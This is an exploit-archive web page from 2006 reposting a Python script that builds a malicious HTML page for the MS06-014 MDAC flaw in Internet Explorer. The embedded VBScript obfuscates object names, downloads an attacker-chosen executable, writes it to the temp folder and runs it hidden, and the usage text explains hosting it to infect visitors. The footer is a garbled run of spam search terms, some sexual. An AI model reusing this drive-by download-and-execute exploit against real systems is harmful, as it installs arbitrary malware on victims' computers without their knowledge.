about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)




2006-07-22 MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) 
Rated as : Critical risk
#!/bin/sh -
"exec" "python" "-O" "$0"
"$@"

__doc__ = """[BL4CK] - MS06-014

RDS.DataStore - Data Execution
CVS-2006-0003
MS06-014

April 2006

*** this is a bit out-dated, but works very well ***

Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe
index.html

Now upload index.html to the same webserver hosting your
http://omfg.what.ho.st/~user/stage2.exe 

                            - redsand@blacksecurity.org
"""

__version__ = "1.0"

import sys, random

class MS06014:
    
    __version = "'[BL4CK] MS06-014 " + __version__ +
"\r\n"


    __html = """
    <title></title>
    <head></head>

    <body>

    <script language="VBScript">

    on error resume next

    BL4CK_PAYLOAD

    </script>
    <head>
    <title>[BL4CK] || 404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    pwn3d!!
    <hr>
    <!-- <script>location.href='http://google.com'</script>
-->
    </body>

    </html>

    """

    __payload = """

    ' due to how ajax works, the file MUST be within the same local
domain
    dl = "URLFILE"

    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")

    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1

    ' xml ajax req
    str6="GET"
    x.Open str6, dl, False
    x.Send

    ' Get temp directory and create our destination name
    fname1="bl4ck.com"
    set F =
df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)
    S.open
    ' open adodb stream and write contents of request to file
    ' like vbs dl+exec code
    S.write x.responseBody
    ' Saves it with CreateOverwrite flag
    S.savetofile fname1,2

    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0

    """

    def	__init__(self, file):

	self.__file = file



    def bl4ck(self):
	self.__payload = self.__payload.replace("URLFILE",self.__file)

	encoded = self.__payload

	ret = self.__html.replace("BL4CK_PAYLOAD",encoded)

	return ret


if __name__ == '__main__':

	url=False
	out=False

	print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
	print "url path to file must be on the same domain as the htm
file"
	print "http://blacksecurity.org\r\n"


	argc = len(sys.argv)
	if(argc <= 2):
        	print "USAGE: %s <download url> <outfile>"
% sys.argv[0]
        	sys.exit(0)
	if(argc > 1):
       		url = sys.argv[1]
	if(argc > 2):
        	out = sys.argv[2]

        ms = MS06014(url)

       	ret = ms.bl4ck()


	try:
	    fsock = open(out, "w+", 0)
	    try:
	        fsock.write(ret );
	    finally:
	        fsock.close()
	except IOError:
	    pass

	print "Wrote %r bytes to: %s" % (len(ret),out)
securitydot.net - 2006-07-22

Advertising

Copyright 2007, SecurityDot
Mon, 13 Oct 2008 10:31:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.Sax18. WWWWORLDSE msxsecurit www.:waptr n...lude($ drew barry xvidoe fre mature sex mallikashe guest book www.sexy WWWWORLDSE bengoli se www.beachs porno alge Www.fun4mo Nangabolly wog Free Tamil www,com89 darpan2112 CMS is Fre search/exp cod2 www.sexysa new search CMS is Fre Video bara xvideos.co IIS WebDAV bengoli se WWW.MASala uncensored all cartoo 123clip.co news for c Www.sex.pi actress xs Www.Indian big coch Remote Buf video sex video sek 123clip.co sexe v& 123clip.co news for c ww.srilang SpeedStrea base 6.htm